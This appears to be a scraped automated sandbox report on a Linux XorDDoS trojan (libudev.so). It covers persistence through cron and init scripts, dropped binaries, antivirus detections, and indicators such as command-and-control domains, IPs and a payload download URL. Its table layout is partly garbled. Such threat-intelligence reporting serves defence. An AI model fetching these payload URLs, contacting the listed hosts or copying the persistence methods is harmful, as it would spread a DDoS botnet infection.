              Source: Yara matchFile source: /usr/bin/chrcfbeejh, type: DROPPED
              Source: Yara matchFile source: /usr/bin/jjfbelholv, type: DROPPED
              Source: Yara matchFile source: /usr/bin/mljnlxkfff, type: DROPPED
              Source: Yara matchFile source: /usr/bin/tiupbsaswr, type: DROPPED
              Source: Yara matchFile source: /etc/init.d/libudev.so, type: DROPPED
              Source: Yara matchFile source: /usr/bin/uhyqxsqece, type: DROPPED
              Source: Yara matchFile source: /usr/bin/uijxdyxaco, type: DROPPED
              Source: Yara matchFile source: /usr/bin/ypclxoxcxk, type: DROPPED
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts2
              Scripting
              1
              Systemd Service
              1
              Systemd Service
              12
              Masquerading
              OS Credential Dumping1
              Security Software Discovery
              Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts2
              At (Linux)
              2
              At (Linux)
              2
              At (Linux)
              2
              Scripting
              LSASS Memory2
              System Information Discovery
              Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
              Non-Application Layer Protocol
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
              Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
              Ingress Tool Transfer
              SIM Card SwapCarrier Billing Fraud
              {"C2 list": []}
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 660268 Sample: libudev.so Startdate: 09/07/2022 Architecture: LINUX Score: 100 72 www1.gggatat456.com 54.36.15.99, 57652, 80 OVHFR France 2->72 74 ppp.xxxatat456.com 2->74 76 6 other IPs or domains 2->76 78 Snort IDS alert for network traffic 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Antivirus detection for dropped file 2->82 84 5 other signatures 2->84 10 libudev.so 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 libudev.so 10->14         started        file6 64 /usr/lib/libudev.so, ELF 14->64 dropped 66 /usr/bin/ypclxoxcxk, ELF 14->66 dropped 68 /usr/bin/uijxdyxaco, ELF 14->68 dropped 70 13 other malicious files 14->70 dropped 92 Drops files in suspicious directories 14->92 94 Sample deletes itself 14->94 96 Sample tries to persist itself using cron 14->96 98 Sample tries to persist itself using System V runlevels 14->98 18 libudev.so sh 14->18         started        22 libudev.so 14->22         started        24 libudev.so 14->24         started        26 100 other processes 14->26 signatures7 process8 file9 62 /etc/crontab, ASCII 18->62 dropped 86 Sample tries to persist itself using cron 18->86 28 sh sed 18->28         started        31 libudev.so mljnlxkfff 22->31         started        33 libudev.so mljnlxkfff 24->33         started        35 libudev.so mljnlxkfff 26->35         started        37 libudev.so mljnlxkfff 26->37         started        39 libudev.so mljnlxkfff 26->39         started        41 97 other processes 26->41 signatures10 process11 signatures12 90 Sample tries to persist itself using cron 28->90 43 mljnlxkfff 31->43         started        46 mljnlxkfff 33->46         started        48 mljnlxkfff 35->48         started        50 mljnlxkfff 37->50         started        52 mljnlxkfff 39->52         started        54 jjfbelholv 41->54         started        56 jjfbelholv 41->56         started        58 jjfbelholv 41->58         started        60 93 other processes 41->60 process13 signatures14 88 Sample deletes itself 43->88
              SourceDetectionScannerLabelLink
              libudev.so72%VirustotalBrowse
              libudev.so65%MetadefenderBrowse
              libudev.so88%ReversingLabsLinux.Network.XorDDoS
              libudev.so100%AviraLINUX/Xorddos.cona
              libudev.so100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              /usr/bin/hfdnmorvjd100%AviraLINUX/Xorddos.cona
              /usr/bin/trcmbxxcta100%AviraLINUX/Xorddos.cona
              /usr/bin/mljnlxkfff100%AviraLINUX/Xorddos.cona
              /usr/bin/ypclxoxcxk100%AviraLINUX/Xorddos.cona
              /usr/bin/fsqerkomug100%AviraLINUX/Xorddos.cona
              /usr/bin/jjfbelholv100%AviraLINUX/Xorddos.cona
              /usr/bin/cjrbrkowir100%AviraLINUX/Xorddos.cona
              /usr/bin/ctwojuywol100%AviraLINUX/Xorddos.cona
              /usr/bin/bnuowhwlvc100%AviraLINUX/Xorddos.cona
              /usr/bin/chrcfbeejh100%AviraLINUX/Xorddos.cona
              /etc/init.d/libudev.so100%AviraLINUX/Xorddos.cona
              /usr/bin/uijxdyxaco100%AviraLINUX/Xorddos.cona
              /usr/bin/uhyqxsqece100%AviraLINUX/Xorddos.cona
              /usr/bin/tiupbsaswr100%AviraLINUX/Xorddos.cona
              /usr/bin/hfdnmorvjd100%Joe Sandbox ML
              /usr/bin/trcmbxxcta100%Joe Sandbox ML
              /usr/bin/mljnlxkfff100%Joe Sandbox ML
              /usr/bin/ypclxoxcxk100%Joe Sandbox ML
              /usr/bin/fsqerkomug100%Joe Sandbox ML
              /usr/bin/jjfbelholv100%Joe Sandbox ML
              /usr/bin/cjrbrkowir100%Joe Sandbox ML
              /usr/bin/ctwojuywol100%Joe Sandbox ML
              /usr/bin/bnuowhwlvc100%Joe Sandbox ML
              /usr/bin/chrcfbeejh100%Joe Sandbox ML
              /etc/init.d/libudev.so100%Joe Sandbox ML
              /usr/bin/uijxdyxaco100%Joe Sandbox ML
              /usr/bin/uhyqxsqece100%Joe Sandbox ML
              /usr/bin/tiupbsaswr100%Joe Sandbox ML
              /etc/cron.hourly/gcc.sh0%MetadefenderBrowse
              /etc/cron.hourly/gcc.sh28%ReversingLabsLinux.Trojan.XorDDoS
              /usr/bin/hfdnmorvjd60%MetadefenderBrowse
              /usr/bin/hfdnmorvjd80%ReversingLabsLinux.Network.XorDDoS
              SourceDetectionScannerLabelLink
              www1.gggatat456.com7%VirustotalBrowse
              ppp.xxxatat456.com8%VirustotalBrowse
              p5.lpjulidny7.com11%VirustotalBrowse
              p5.dddgata789.com2%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yp100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hf100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tr100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cu100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ui100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uh100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zp100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ti100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cj100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hr100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bn100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9fs100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jj100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ml100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mo100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t100%Avira URL Cloudmalware
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ch100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              www1.gggatat456.com
              54.36.15.99
              truetrueunknown
              ppp.xxxatat456.com
              54.36.15.96
              truetrueunknown
              p5.lpjulidny7.com
              unknown
              unknownfalseunknown
              p5.dddgata789.com
              unknown
              unknownfalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://www1.gggatat456.com/dd.rartrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yplibudev.so, 6369.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6372.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6375.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6377.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6380.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hflibudev.so, 6476.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6479.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6482.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6484.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6489.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9trlibudev.so, 6298.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6301.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6303.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6306.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6309.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9culibudev.so, 6530.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6533.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6536.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6539.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6541.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ctlibudev.so, 6315.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6318.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6321.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6324.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6327.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uilibudev.so, 6424.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6427.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6430.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6432.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6435.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uhlibudev.so, 6388.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6391.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6393.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6396.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6399.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zplibudev.so, 6548.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6551.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tilibudev.so, 6407.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6410.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6413.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6415.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6418.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.gnu.org/software/libc/bugs.htmllibudev.so, hfdnmorvjd.11.dr, trcmbxxcta.11.dr, mljnlxkfff.11.dr, ypclxoxcxk.11.dr, fsqerkomug.11.dr, jjfbelholv.11.dr, cjrbrkowir.11.dr, ctwojuywol.11.dr, bnuowhwlvc.11.dr, chrcfbeejh.11.dr, libudev.so0.11.dr, uijxdyxaco.11.dr, uhyqxsqece.11.dr, tiupbsaswr.11.drfalse
                high
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cjlibudev.so, 6351.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6354.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6356.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6359.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6362.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hrlibudev.so, 6512.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6515.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6517.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6520.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6523.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bnlibudev.so, 6441.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6444.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6447.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6450.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6452.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9fslibudev.so, 6334.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6337.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6339.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6342.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6345.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jjlibudev.so, 6280.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6283.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6286.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6289.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6291.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mllibudev.so, 6263.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6266.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6268.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6271.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6273.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9molibudev.so, 6495.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6498.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6501.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6503.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6506.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/tlibudev.so, 6230.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6232.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6233.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6234.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9chlibudev.so, 6459.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6462.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6464.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6468.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6470.1.00000000ffc1f000.00000000ffc40000.rw-.sdmptrue
                • Avira URL Cloud: malware
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                54.36.15.99
                www1.gggatat456.comFrance
                16276OVHFRtrue
                109.202.202.202
                unknownSwitzerland
                13030INIT7CHfalse
                51.89.52.12
                unknownFrance
                16276OVHFRfalse
                91.189.91.43
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                91.189.91.42
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                54.36.15.990Xorddos.oGet hashmaliciousBrowse
                • www1.gggatat456.com/dd.rar
                109.202.202.202arm7-20220709-1550Get hashmaliciousBrowse
                  arm-20220709-1550Get hashmaliciousBrowse
                    x86-20220709-1550Get hashmaliciousBrowse
                      WeKyWo9tMrGet hashmaliciousBrowse
                        u2yPE4ulqUGet hashmaliciousBrowse
                          abzFDQzHwAGet hashmaliciousBrowse
                            9FeNxlC5VPGet hashmaliciousBrowse
                              sFSyiH2hxvGet hashmaliciousBrowse
                                Cqr4aAWtE3Get hashmaliciousBrowse
                                  boVTvIxPspGet hashmaliciousBrowse
                                    J72xDpBPAjGet hashmaliciousBrowse
                                      IvLOIlinPdGet hashmaliciousBrowse
                                        HPCKmtqDldGet hashmaliciousBrowse
                                          iRXU7KbQLUGet hashmaliciousBrowse
                                            YUNdqEb6fkGet hashmaliciousBrowse
                                              home.arm6-20220709-1259Get hashmaliciousBrowse
                                                home.mpsl-20220709-1300Get hashmaliciousBrowse
                                                  home.arm5-20220709-1300Get hashmaliciousBrowse
                                                    home.x86-20220709-1250Get hashmaliciousBrowse
                                                      home.mips-20220709-1300Get hashmaliciousBrowse
                                                        51.89.52.120Xorddos.oGet hashmaliciousBrowse
                                                          91.189.91.43arm7-20220709-1550Get hashmaliciousBrowse
                                                            arm-20220709-1550Get hashmaliciousBrowse
                                                              x86-20220709-1550Get hashmaliciousBrowse
                                                                WeKyWo9tMrGet hashmaliciousBrowse
                                                                  u2yPE4ulqUGet hashmaliciousBrowse
                                                                    abzFDQzHwAGet hashmaliciousBrowse
                                                                      9FeNxlC5VPGet hashmaliciousBrowse
                                                                        sFSyiH2hxvGet hashmaliciousBrowse
                                                                          Cqr4aAWtE3Get hashmaliciousBrowse
                                                                            boVTvIxPspGet hashmaliciousBrowse
                                                                              J72xDpBPAjGet hashmaliciousBrowse
                                                                                IvLOIlinPdGet hashmaliciousBrowse
                                                                                  HPCKmtqDldGet hashmaliciousBrowse
                                                                                    iRXU7KbQLUGet hashmaliciousBrowse
                                                                                      YUNdqEb6fkGet hashmaliciousBrowse
                                                                                        home.arm6-20220709-1259Get hashmaliciousBrowse
                                                                                          home.mpsl-20220709-1300Get hashmaliciousBrowse
                                                                                            home.arm5-20220709-1300Get hashmaliciousBrowse
                                                                                              home.x86-20220709-1250Get hashmaliciousBrowse
                                                                                                home.mips-20220709-1300Get hashmaliciousBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  ppp.xxxatat456.com0Xorddos.oGet hashmaliciousBrowse
                                                                                                  • 79.137.1.132
                                                                                                  libudev.soGet hashmaliciousBrowse
                                                                                                  • 151.80.176.165
                                                                                                  TPHM5fHHv1Get hashmaliciousBrowse
                                                                                                  • 51.38.200.186
                                                                                                  www1.gggatat456.comxor1.oGet hashmaliciousBrowse
                                                                                                  • 54.36.15.99
                                                                                                  0Xorddos.oGet hashmaliciousBrowse
                                                                                                  • 54.36.15.99
                                                                                                  http://www1.gggatat456.com/dd.rarGet hashmaliciousBrowse
                                                                                                  • 51.68.183.108
                                                                                                  w.txtGet hashmaliciousBrowse
                                                                                                  • 92.222.83.172
                                                                                                  w.txtGet hashmaliciousBrowse
                                                                                                  • 92.222.83.172
                                                                                                  1433.binGet hashmaliciousBrowse
                                                                                                  • 91.134.134.116
                                                                                                  libudev.soGet hashmaliciousBrowse
                                                                                                  • 91.134.134.116
                                                                                                  TPHM5fHHv1Get hashmaliciousBrowse
                                                                                                  • 51.77.240.165
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  OVHFRabzFDQzHwAGet hashmaliciousBrowse
                                                                                                  • 51.68.137.177
                                                                                                  KW0mMJHX31Get hashmaliciousBrowse
                                                                                                  • 217.182.96.34
                                                                                                  DB50D646494970B78887D4D84F52147C4CDBAA0B23CB4.exeGet hashmaliciousBrowse
                                                                                                  • 217.182.208.40
                                                                                                  SB8iEj89bZ.exeGet hashmaliciousBrowse
                                                                                                  • 51.89.16.8
                                                                                                  EA26kwLQHE.exeGet hashmaliciousBrowse
                                                                                                  • 91.134.184.195
                                                                                                  4kvcuVD5jt.exeGet hashmaliciousBrowse
                                                                                                  • 91.134.184.195
                                                                                                  K0jhk7XA76.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  rmRMQ5rfby.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  dps6GhLM6K.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  vFIcuFD2PD.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  uyvZt51na3.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  K0jhk7XA76.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  LycZTx0WaJ.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  6ttMM5dkAS.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  pXdiSYVkq0.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  YzY4Tgb2Zt.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  6ttMM5dkAS.dllGet hashmaliciousBrowse
                                                                                                  • 54.37.228.122
                                                                                                  AVANCIE.xlsGet hashmaliciousBrowse
                                                                                                  • 94.23.45.86
                                                                                                  https://iconicdesignstudio.co.in/Get hashmaliciousBrowse
                                                                                                  • 51.210.113.204
                                                                                                  aqua.armGet hashmaliciousBrowse
                                                                                                  • 213.32.50.248
                                                                                                  INIT7CHarm7-20220709-1550Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  arm-20220709-1550Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  x86-20220709-1550Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  WeKyWo9tMrGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  u2yPE4ulqUGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  abzFDQzHwAGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  9FeNxlC5VPGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  sFSyiH2hxvGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  Cqr4aAWtE3Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  boVTvIxPspGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  J72xDpBPAjGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  IvLOIlinPdGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  HPCKmtqDldGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  iRXU7KbQLUGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  YUNdqEb6fkGet hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  home.arm6-20220709-1259Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  home.mpsl-20220709-1300Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  home.arm5-20220709-1300Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  home.x86-20220709-1250Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  home.mips-20220709-1300Get hashmaliciousBrowse
                                                                                                  • 109.202.202.202
                                                                                                  No context
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  /etc/cron.hourly/gcc.sh23.virGet hashmaliciousBrowse
                                                                                                    23.virGet hashmaliciousBrowse
                                                                                                      xor1.oGet hashmaliciousBrowse
                                                                                                        CCCxor.oGet hashmaliciousBrowse
                                                                                                          2BAFxor.oGet hashmaliciousBrowse
                                                                                                            task2.binGet hashmaliciousBrowse
                                                                                                              task2.binGet hashmaliciousBrowse
                                                                                                                task2.binGet hashmaliciousBrowse
                                                                                                                  0Xorddos.oGet hashmaliciousBrowse
                                                                                                                    x.oGet hashmaliciousBrowse
                                                                                                                      23Get hashmaliciousBrowse
                                                                                                                        23Get hashmaliciousBrowse
                                                                                                                          XZFWLZVF1ZGet hashmaliciousBrowse
                                                                                                                            EgrT0zBhDaGet hashmaliciousBrowse
                                                                                                                              4ljhdTTyiAGet hashmaliciousBrowse
                                                                                                                                7nJAEBDitlGet hashmaliciousBrowse
                                                                                                                                  ygljglkjgfg0Get hashmaliciousBrowse
                                                                                                                                    bVexvNSHcDGet hashmaliciousBrowse
